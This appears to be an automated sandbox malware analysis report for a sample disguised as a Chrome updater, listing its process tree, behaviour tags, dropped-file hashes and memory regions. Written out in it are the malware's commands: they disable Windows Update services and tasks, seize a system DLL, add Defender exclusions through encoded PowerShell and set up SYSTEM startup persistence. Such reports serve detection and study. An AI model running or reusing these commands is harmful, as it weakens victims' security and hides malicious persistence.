C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdwBtAG0AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABFAEEAWQBnAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBiAFEAQgB6AEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBvAGoAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAGkAZwBkACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQB4AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAA1ADgAZQA4ADAAMQBkAGYAZABhAGEANwA1AGUAZgA5ADcANwBmAGUAYQAwADEAYQAyADAAMABmADkAMABlADcAMgAwADIANAAwADYAOAAzADMAYQAxAGUAMgBjADAANgBlAGIAZQAxADUAYQA5ADkAYQA3ADIAYwAzADgAOQA1AC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAeABqAGQAaQAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAbABvACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAOwA="3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE5⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE5⤵
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bmkeytcye"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe sosudejrcxm1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8dyBC4RhMJQS3ZIS6W4m7i7iEJ7cohkojQOsRFzNMr564⤵
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.1MB
MD52144e985a1fb8a18636dee1b1fcf096f
SHA1fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
SHA25658e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
SHA51248d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d40967c47cf326de693576ebae1d8522
SHA17d1b6f9e84fb5d3d933496acc7e568f0e321920f
SHA256ef5b2454edae5f5327531699e2815257ae55aa7f008c3067bd4127865bb932f9
SHA512b28c4fab919d81bc6966796a423499aeb0526a38f88c9437958b1b8de930be542aaee1e654716d5ed8803416bc2f252d094a374db1952f2285de2f112f6219d7
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD55d574dc518025fad52b7886c1bff0e13
SHA168217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA51221de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5e2d46bffd1d9300639cac360fac02cb4
SHA1fd2b4813c8ab610294b6759192ca05bad5bb8958
SHA25694ffe575e92d3bab6173fd7eca207088c8b374de79d93dddf45101048c0bead3
SHA51254b1ea5f5bb1d8a402fbb5ab8f0d7bec9aa47cb48a4c411ee8032648a97efe466d9d8e7f87c5ac288e994eeb47e034eac94bb3631955f9ba2270d687e7620535
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD5c5227366b7a688ff23b01788718251aa
SHA19795262e79c832ba49c744fcd1b1794c0ffb5c6a
SHA256789abfd744b03d07fac02be7177c535989ea9e92b9db32fb1360cdfd083a1f48
SHA5128b9560fa2265f74aec7bb7b96e5a7dba789edc4166e58af9994a1ee95fa42b22a7539be804f4fcf3d5a9e657be020087a343b030fee6aaddbb67b1134810cfbe
-
memory/60-190-0x0000000000000000-mapping.dmp
-
memory/532-423-0x0000000000000000-mapping.dmp
-
memory/544-122-0x00007FFAA0ED0000-0x00007FFAA10AB000-memory.dmpFilesize
1.9MB
-
memory/544-121-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/544-118-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/544-120-0x00007FFAA0ED0000-0x00007FFAA10AB000-memory.dmpFilesize
1.9MB
-
memory/544-119-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/680-127-0x000001217CF70000-0x000001217D38E000-memory.dmpFilesize
4.1MB
-
memory/680-130-0x0000012179F50000-0x000001217A36E000-memory.dmpFilesize
4.1MB
-
memory/1196-143-0x0000021A6B0E0000-0x0000021A6B156000-memory.dmpFilesize
472KB
-
memory/1196-140-0x0000021A52A90000-0x0000021A52AB2000-memory.dmpFilesize
136KB
-
memory/1196-135-0x0000000000000000-mapping.dmp
-
memory/1488-431-0x0000000000000000-mapping.dmp
-
memory/1536-448-0x0000000000000000-mapping.dmp
-
memory/1576-231-0x0000000000000000-mapping.dmp
-
memory/1596-449-0x0000000000000000-mapping.dmp
-
memory/1632-462-0x0000000000000000-mapping.dmp
-
memory/1644-191-0x0000000000000000-mapping.dmp
-
memory/1644-433-0x0000000000000000-mapping.dmp
-
memory/1784-223-0x0000000000000000-mapping.dmp
-
memory/1848-460-0x0000000000000000-mapping.dmp
-
memory/1880-459-0x0000000000000000-mapping.dmp
-
memory/1884-232-0x0000000000000000-mapping.dmp
-
memory/1896-185-0x0000000000000000-mapping.dmp
-
memory/1928-468-0x0000000000000000-mapping.dmp
-
memory/1932-186-0x0000000000000000-mapping.dmp
-
memory/1932-427-0x0000000000000000-mapping.dmp
-
memory/1984-458-0x0000000000000000-mapping.dmp
-
memory/2200-188-0x0000000000000000-mapping.dmp
-
memory/2308-264-0x00007FFAA0ED0000-0x00007FFAA10AB000-memory.dmpFilesize
1.9MB
-
memory/2308-258-0x0000000000000000-mapping.dmp
-
memory/2308-261-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/2308-262-0x00007FFAA0ED0000-0x00007FFAA10AB000-memory.dmpFilesize
1.9MB
-
memory/2308-263-0x0000000000400000-0x0000000001066000-memory.dmpFilesize
12.4MB
-
memory/2600-428-0x000001E6EE800000-0x000001E6EE806000-memory.dmpFilesize
24KB
-
memory/2600-437-0x000001E6EE830000-0x000001E6EE842000-memory.dmpFilesize
72KB
-
memory/2612-233-0x0000000000000000-mapping.dmp
-
memory/2644-461-0x0000000000000000-mapping.dmp
-
memory/2732-184-0x0000000000000000-mapping.dmp
-
memory/2940-425-0x0000000000000000-mapping.dmp
-
memory/2956-227-0x0000000000000000-mapping.dmp
-
memory/3112-451-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3112-456-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3112-457-0x00000000010F0000-0x0000000001110000-memory.dmpFilesize
128KB
-
memory/3112-454-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3112-452-0x000000014036EAC4-mapping.dmp
-
memory/3112-470-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3112-469-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3180-192-0x0000000000000000-mapping.dmp
-
memory/3188-224-0x0000000000000000-mapping.dmp
-
memory/3188-450-0x0000000000000000-mapping.dmp
-
memory/3196-432-0x0000000000000000-mapping.dmp
-
memory/3460-435-0x0000000000000000-mapping.dmp
-
memory/3736-434-0x0000000000000000-mapping.dmp
-
memory/3768-177-0x0000000000000000-mapping.dmp
-
memory/3828-465-0x0000000000000000-mapping.dmp
-
memory/3876-189-0x0000000000000000-mapping.dmp
-
memory/4040-193-0x0000000000000000-mapping.dmp
-
memory/4192-183-0x0000000000000000-mapping.dmp
-
memory/4208-182-0x0000000000000000-mapping.dmp
-
memory/4220-422-0x0000000000000000-mapping.dmp
-
memory/4252-175-0x0000000000000000-mapping.dmp
-
memory/4256-180-0x0000000000000000-mapping.dmp
-
memory/4308-467-0x0000000000000000-mapping.dmp
-
memory/4348-430-0x0000000000000000-mapping.dmp
-
memory/4452-438-0x0000000000000000-mapping.dmp
-
memory/4480-220-0x0000000000000000-mapping.dmp
-
memory/4520-221-0x0000000000000000-mapping.dmp
-
memory/4536-446-0x0000000000000000-mapping.dmp
-
memory/4544-222-0x0000000000000000-mapping.dmp
-
memory/4564-436-0x0000000000000000-mapping.dmp
-
memory/4608-466-0x0000000000000000-mapping.dmp
-
memory/4628-453-0x0000012E92460000-0x0000012E92467000-memory.dmpFilesize
28KB
-
memory/4628-444-0x0000012E92B80000-0x0000012E92B86000-memory.dmpFilesize
24KB
-
memory/4640-230-0x0000000000000000-mapping.dmp
-
memory/4664-237-0x0000000000000000-mapping.dmp
-
memory/4664-463-0x0000000000000000-mapping.dmp
-
memory/4788-187-0x0000000000000000-mapping.dmp
-
memory/4808-426-0x0000000000000000-mapping.dmp
-
memory/4832-178-0x0000000000000000-mapping.dmp
-
memory/4860-179-0x0000000000000000-mapping.dmp
-
memory/4884-176-0x0000000000000000-mapping.dmp
-
memory/4888-464-0x0000000000000000-mapping.dmp
-
memory/4912-429-0x0000000000000000-mapping.dmp
-
memory/5016-275-0x0000000000000000-mapping.dmp
-
memory/5016-331-0x00000210471D0000-0x00000210471DA000-memory.dmpFilesize
40KB
-
memory/5016-298-0x0000021047360000-0x0000021047419000-memory.dmpFilesize
740KB
-
memory/5016-292-0x00000210471B0000-0x00000210471CC000-memory.dmpFilesize
112KB
-
memory/5056-181-0x0000000000000000-mapping.dmp